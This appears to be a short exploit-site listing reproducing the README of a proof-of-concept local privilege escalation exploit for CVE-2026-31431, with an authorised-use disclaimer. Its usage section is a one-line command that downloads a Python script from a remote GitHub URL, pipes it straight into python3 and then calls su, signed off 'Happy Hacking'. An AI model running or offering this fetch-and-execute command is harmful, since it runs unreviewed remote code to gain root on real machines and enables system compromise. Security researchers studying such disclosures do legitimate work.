Share
## https://sploitus.com/exploit?id=BBD045DE-431D-5EC8-B3D2-66404103E17B
# CVE-2026-31431 Proof of Concept (PoC)

This repository contains a Proof of Concept (PoC) exploit for **CVE-2026-31431**, demonstrating a local privilege escalation vulnerability.

---

> [!WARNING]
> This project is intended **strictly for educational and security research purposes only**.  
> Use it only on systems you own or systems where you have explicit written authorization to test.  
> Unauthorized use may be illegal and is strongly discouraged.

---

## Usage

Just Run :

```
curl -s https://raw.githubusercontent.com/AliHzSec/CVE-2026-31431/refs/heads/master/main.py | python3 && su
```

Happy Hacking :)